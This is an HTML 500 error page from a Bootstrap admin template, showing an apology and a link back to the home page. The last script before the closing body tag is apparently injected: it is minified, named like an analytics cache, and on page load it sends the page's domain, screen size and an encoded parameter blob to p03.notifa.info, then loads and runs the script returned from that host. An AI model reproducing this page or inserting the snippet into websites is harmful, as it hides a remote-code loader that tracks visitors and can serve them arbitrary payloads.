<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="keyword" content="">
    <link rel="shortcut icon" href="img/favicon.png">

    <title>500</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/bootstrap-reset.css" rel="stylesheet">
    <!--external css-->
    <link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
    <!-- Custom styles for this template -->
    <link href="css/style.css" rel="stylesheet">
    <link href="css/style-responsive.css" rel="stylesheet" />

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 tooltipss and media queries -->
    <!--[if lt IE 9]>
    <script src="js/html5shiv.js"></script>
    <script src="js/respond.min.js"></script>
    <![endif]-->
</head>




  <body class="body-500">

    <div class="error-head"> </div>

    <div class="container ">

      <section class="error-wrapper text-center">
          <h1><img src="images/500.png" alt=""></h1>
          <div class="error-desk">
              <h2>OOOPS!!!</h2>
              <p class="nrml-txt-alt">Something went wrong.</p>
              <p>Why not try refreshing you page? Or you can <a href="#" class="sp-link">contact our support</a> if the problem persists.</p>
          </div>
          <a href="index.html" class="back-btn"><i class="fa fa-home"></i> Back To Home</a>
      </section>

    </div>


  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m2Fs3OQRUn45X9%2fBzrocz80BcIW94%2boZBl70v3awT733Ljj7Bzv4F46dYmvZqIr91W3wbe3luezt9VA9%2fA921xMYnaMU2Vn7v67woLZHV9CsUtUooEQeRf%2bIpztwKsWVtRL1hQ%2b7bGnYo9IQT8BFHtshn8el9hNGNVoM%2fdkU%2bMmBywbDSuGcqBFnHebgyHXPqBrKIFWEV73fXihGzfSJJoZcYIzkkptp4WpOFMQd4OnqwmNKtpNIoSoYEmS7W%2fLYPR2v%2bEa8BrJtxWp%2fXNjp9cNFWEudMZWYyngOOHljZ1%2fUZwbXwKGqJmYvfmzjGjPbdVFrTWd%2bB8HYZDtjSn%2b%2b5pmxlfBJISSOsAIlluZUrW2m7gsqPushyhls%2ba5F0VAcCdQZcu6VwiNGQysuFSyGHAPgUSTMKl%2fwmbFoOuSR3sErf60pa84rQtmxtAqRPd5cPpF8e54hSDOJsiHVlD596g4mk9Z9Rrz9qIaRFV8MUzRU%2bhn7QZL%2fHIwPC3KNErGXy7q2dg5cg4cM6pIFtvviXg4O64BeD8QGe9YEHoPhrkyA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
